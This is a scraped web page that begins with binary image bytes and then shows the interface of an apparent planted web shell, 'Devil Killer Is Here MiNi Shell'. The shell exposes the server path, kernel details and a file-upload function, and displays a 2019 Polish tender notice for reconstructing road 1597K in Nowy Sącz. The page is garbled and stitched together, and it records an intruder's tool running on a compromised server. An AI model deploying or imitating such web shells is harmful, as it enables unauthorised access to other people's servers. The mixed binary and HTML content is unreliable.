JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190920/600567-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 600567-N-2019 z dnia 2019-09-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miejski Zarząd Dróg</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przebudowa drogi powiatowej 1597K na odcinku od km 1+112,36 do km 2+111,36 w miejscowości Nowy Sącz, Gmina Nowy Sącz</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miejski Zarząd Dróg</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wyspiańskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33-300</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowy Sącz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">18-4427967</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">mzd_ns@ns.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">184 427 800</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.mzd.nowysacz.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.mzd.nowysacz.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.mzd.nowysacz.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie na adres siedziby Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">33-300 Nowy Sącz ul.Wyspiańskiego 22</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przebudowa drogi powiatowej 1597K na odcinku od km 1+112,36 do km 2+111,36 w miejscowości Nowy Sącz, Gmina Nowy Sącz</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">271.2.5.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Szczegółowy opis przedmiotu zamówienia:Przebudowa drogi powiatowej 1597K na odcinku od km 1+112,36 do km 2+111,36 w miejscowości Nowy Sącz, Gmina Nowy Sącz ( ul.Grodzka, skrzyżowanie ulic Grodzka-Jagiellońska-Kunegundy, ul.Kunegundy ):roboty przygotowawcze i rozbiórkoweo	roboty remontowe - frezowanie nawierzchni bitumicznej o gr. 10 cm z wywozem materiału z rozbiórkio	rozebranie nawierzchni z płyt drogowych betonowych o grubości 15 cm z wypełnieniem spoin piaskiemo	rozebranie nawierzchni z klinkieru drogowego na podsypce piaskowej - rozbiórka nawierzchni z kostki brukowej betonowejo	ścinanie drzew piłą mechaniczną (śr. 10-15 cm) z wywozemo	ścinanie drzew piłą mechaniczną (śr. 16-25 cm) z wywozemo	ścinanie drzew piłą mechaniczną (śr. 26-35 cm) z wywozemo	ścinanie drzew piłą mechaniczną (śr. 56-65 cm) z wywozemo	mechaniczne karczowanie pni (śr. 10-15 cm)o	mechaniczne karczowanie pni (śr. 16-25 cm)o	mechaniczne karczowanie pni (śr. 26-35 cm)o	mechaniczne karczowanie pni (śr. 56-65 cm)o	mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o grubości 3 cmo	rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych 50x50x7 cm na podsypce piaskowejo	rozebranie krawężników betonowych 15x30 cm na podsypce cementowo piaskowejo	rozebranie ław pod krawężniki z betonuo	rozebranie obrzeży 8x30 cm na podsypce piaskowejo	rozebranie studzienek ściekowych z gotowych elementów z wywozem gruzuo	demontaż sygnalizacji świetlnej skrzyżowania ulicy Grodzkiej- Kunegundy- Jagiellońska- demontaż z wywozem i utylizacjąo	demontaż słupa oświetlenia ulicznego z wywozem i utylizacjąo	załadunek i wywóz gruzuroboty ziemneo	roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.60 m3 w gruncie kat. III z transportem urobku samochodami samowyładowczymi na odległość do 10 km- roboty ziemne i rozbiórka podbudowykrawężniki i obrzeżao	ława pod krawężniki betonowa z oporemo	krawężniki kamienne wystające o wymiarach 20x25 cm na podsypce cementowo-piaskowejo	krawężniki betonowe wystające o wymiarach 15x30 cm na podsypce cementowo-piaskowejo	ława pod krawężniki betonowa zwykłao	obrzeża betonowe o wymiarach 25x8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementowąodwodnienieo	ława pod krawężniki betonowa zwykłao	ścieki uliczne z kostki kamiennej nieregularnej o wysokości 10 cm na podsypce cementowo-piaskowej - 2 rzędyo	ścieki uliczne z dwóch rzędów klinkieru drogowego na płask jednoskrzydłowe na podsypce cementowo-piaskowej - z kostki brukowej betonowej gr. 8cmo	roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.25 m3 w gruncie kat. III z transportem urobku samochodami samowyładowczymi na odległość do 5 kmo	kanały rurowe - podłoża z materiałów sypkich o grubości 20 cmo	studzienki ściekowe z gotowych elementów betonowe o śr. 500 mm z osadnikiem bez syfonuo	kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mmo	obsypka rurociągu kruszywem dowiezionymjezdniao	warstwa mrozoochronna z gruntu stabilizowanego drogowym spoiwem hydraulicznym gr.36 cm- Rm =2,0 Mpao	podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 20cmo	podbudowa z mieszanki mineralno-bitumicznej klińcowo-żwirowej o lepiszczu asfaltowym - grubość warstwy po zagęszczeniu 7 cm- beton asfaltowy KR3 AC22Po	skropienie nawierzchni drogowej asfaltem skropienie międzywarstwoweo	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszczeniu 5 cm- beton asfaltowy KR3 AC16W PBMo	skropienie nawierzchni drogowej asfaltem- skropienie międzywarstwoweo	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 4 cm- beton asfaltowy KR3 AC11S PMB (polimeroasfalt)o	podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 20cmo	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa wiążąca asfaltowa - grubość po zagęszczeniu 5 cm- beton asfaltowy KR2 AC16Wo	skropienie nawierzchni drogowej asfaltem- skropienie międzywarstwoweo	nawierzchnia z mieszanek mineralno-bitumicznych grysowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 4 cm- beton asfaltowy KR2 AC11So	podbudowa betonowa z dylatacją - grubość warstwy po zagęszczeniu 24 cm- beton C16/20o	nawierzchnia z kostki kamiennej rzędowej o wysokości 16 cm na podsypce cementowo-piaskowej - kostka granitowa 15 x 17o	regulacja pionowa studzienek dla włazów kanałowycho	regulacja pionowa studzienek dla zaworów wodociągowych i gazowychchodniko	mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IVo	podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 20cmo	nawierzchnie z kostki brukowej betonowej o grubości 6 cm na podsypce piaskowejo	regulacja pionowa studzienek dla włazów kanałowycho	regulacja pionowa studzienek dla studzienek telefonicznycho	regulacja pionowa studzienek dla zaworów wodociągowych i gazowychzielenieco	sadzenie drzew liściastych form naturalnych na terenie płaskim w gruncie kat.III bez zaprawy dołów; średnica/głębokość: 0.7 m - obwód pni min. 12cm -gatunek do ustalenia z Ogrodnikiem Miejskimo	ręczne rozrzucenie ziemi żyznej lub kompostowej na terenie płaskim grubość warstwy 5 cm ziemia urodzajna (humus)o	wykonanie trawników dywanowych siewem na gruncie kat. I-II bez nawożeniaoznakowanie poziome, pionowe, oświetlenie o	oznakowanie poziome nawierzchni bitumicznych - grubowarstwoweo	oznakowanie poziome nawierzchni bitumicznych - grubowarstwowe czerwoneo	montaż słupka do znaków drogowycho	montaż znaków drogowycho	montaż znaku drogowego F10o	montaż tablicy informacyjnej o dofinansowaniuo	wykonanie dedykowanego oświetlenia przejścia dla pieszych zgodnie z Wytycznymi Prawidłowego Oświetlenia Przejść Dla Pieszych opracowanych na zamówienie Ministerstwa Infrastruktury wraz przyłączeniemo	przełożenie lamp oświetleniowycho	montaż potrójnej lampy oświetleniowej na wyspie centralnej ronda z podpięciem do istniejącej siecio	montaż radaru z wyświetlaczem prędkości zasilany solarnie umożliwiający pomiar prędkości nadjeżdżającego samochodu na dużym czytelnym wyświetlaczuo	system ochrony pieszych - znak D6 nad jezdnią z podświetlaniem przejścia dla pieszych o zmiennej mocy z dualnymi czujnikami ruchubudowa sieci kanalizacji deszczowej w ul.Grodzkiej w Nowym Sączu odcinek od ul.Św. Kunegundy do Al. Wolności:w związku z zamiarem wykonania przebudowy ul. Grodzkiej na odcinku od Al. Wolności do ul.Św. Kunegundy podjęto decyzję o rozdziale kanalizacji ogólnospławnej na deszczową i sanitarną i budowie sieci kanalizacji deszczowej i przykanalikami z wpustami ulicznymi jako odwodnienie ulicy Grodzkiej.Pierwszy odcinek od projektowanego ronda ul. Św. Kunegundy, ul. Jagiellońskiej i ul.Grodzkiej w stronę Al. Wolności z wyjściami siecią kanalizacji deszczowej w stronę ul.Św.Kunegundy, ul. Jagiellońskiej, ul. Sienkiewicza, odprowadzać będą wody opadowe w tym etapie do kanalizacji ogólnospławnej w ul. Jagiellońskiej do studzienki D1.0. W studzience D1.1. zaprojektowano wyjście przelotowe ?600 w kierunku ul.Mickiewicza i w tym etapie to wyjście będzie zaślepione, natomiast na tym etapie ścieki odprowadzane będą wyjściem ?300 kaskadowo do kanalizacji ogólnospławnej. Przed rozbudową sieci kanalizacji deszczowej w stronę południową wcześniej należy wykonać docelowy odcinek do ul. Mickiewicza. Studnię D1.2 wykonać jako komorę kaskadową.Drugi odcinek od ul.1 Pułku Strzelców Podhalańskich do Al. Wolności z wyjściami siecią kanalizacji deszczowej w stronę ul. 1 Pułku Strzelców Podhalańskich i ul.1 Maja odprowadzać będą wody opadowe do istniejącej studzienki D2.0 na sieci kanalizacji deszczowej w Al. Wolności.Sieć kanalizacji deszczowej projektuje się z rur tworzywowych, strukturalnych o średnicy 600, 400 i 300mm oraz przykanaliki: rury strukturalne ?200 mm, studzienki betonowe o średnicy 1200mm.Kanalizację proponuje się wykonać z rur strukturalnych o podwójnej ściance PP, sztywności obwodowej SN8 (spełniających wymagania normy PN-EN 13476) o średnicy 400,300 i 200mm, łączonych na kielichy za pomocą uszczelki.Kanalizację o ?600 proponuje się wykonać z rur strukturalnych o podwójnej ściance PP, sztywności obwodowej SN12 (spełniających wymagania normy PN-EN 13476) łączonych na kielichy za pomocą uszczelki.Na połączeniach i załamaniach projektowane są studnie z kręgów betonowych łączonych na zaprawę wodoszczelną o średnicy ?1200 mm.Projektowane studnie należy nakryć włazami kanałowymi, żeliwnymi klasy D400 wg PN-EN 124- zgodnie z obowiązującą normą i wymaganiami podanymi przez administratora ulicy.Odwodnienie przebudowywanego odcinka ulicy nastąpi poprzez nowe wpusty uliczne, betonowe o średnicy 500 mm z osadnikiem o pojemności ok. 100 dcm3. Jako zwieńczenie studzienek projektuje się kratki żeliwne, ściekowe, uliczne - typ D400 na pierścieniu odciążającym.Wpusty uliczne należy połączyć ze studniami przykanalikami z rur strukturalnych o średnicy 200 mm ze spadkami wg rys. profilu.Rury należy układać w wykopie na podłożu z piasku gr.15 cm: dolną warstwę podsypki zagęścić do wartości 0.98 wg standardowej próby Proctora, górna warstwa podsypki o grubości min. 5cm powinna być ułożona luźno, tak by karby rury mogły się w niej swobodnie zagłębić. Po ułożeniu rur, należy wykonać zasyp ochronny grubości 15 cm ponad lico rury z piasku, zagęszczając po obu stronach warstwami 20cm. Pozostałą część wykopu należy zasypać żwirem na pełną głębokość - zagęszczanym warstwami co 20 cm z kontrolą wskaźnika zagęszczania oraz wykonać podbudowę zgodnie z warunkami podanymi przez administratora ulicy.przebudowa/przełożenie/zabezpieczenie sieci energetycznej i oświetlenia ulicznego:przedmiotem opracowania jest oświetlenie projektowanego ronda wraz z przebudowami, zabezpieczeniami istn. sieci nN i SN oraz doświetlenie istn. przejść dla pieszych.Zasilanie proj. słupów oświetleniowych, znaków aktywnych D-6 oraz radarowego wyświetlacza prędkości odbywać się będzie z istn. słupów oświetlenia drogowego. Istniejąca moc jest wystarczająca dla prawidłowegofunkcjonowania projektowanego oświetlenia. Oświetlenie przejść dla pieszych:Przejście dla pieszych w km 12+58,00 ul. GrodzkaZ istn. słupa oświetlenia ulicznego zlokalizowanego przy istn. przejściu dla pieszych na ul.Grodzkiej w km 12+58,00 ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110, do proj. słupa oświetleniowego P1, a następnie ze słupa P1 do słupa oświetleniowego P2.Proj. oprawy oświetleniowe zabezpieczyć wkładką topikową 6A w złączach słupowych.Przejścia dla pieszych w obrębie skrzyżowania ulic: Grodzka, Jagiellońska, św. Kundegundy km14+58,18Z istn. słupa oświetlenia ulicznego zlokalizowanego przy projektowanym rondzie ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110 pomiędzy proj. Słupami oświetleniowymi zgodnie z załączoną mapą. Proj. oprawy oświetleniowe zabezpieczyć wkładką topikową 6A w złączach słupowych.Przejście dla pieszych w km 15+53,93 ul. św KunegundyZ istn. słupa oświetlenia ulicznego zlokalizowanego przy istn. przejściu dla pieszych na ul. św.Kunegundy w km 15+53,93 ułożyć kabel ziemny typu YAKXS 4x35mm2 w rurze ochronnej DVR110 do proj. słupa oświetleniowego P8, a następnie ze słupa P8 do słupa oświetleniowego P9. Proj. oprawy oświetleniowe zabezpieczyć wkładką topikową 6A w złączach słupowych.Przejście dla pieszych w km 18+06,57 ul. św 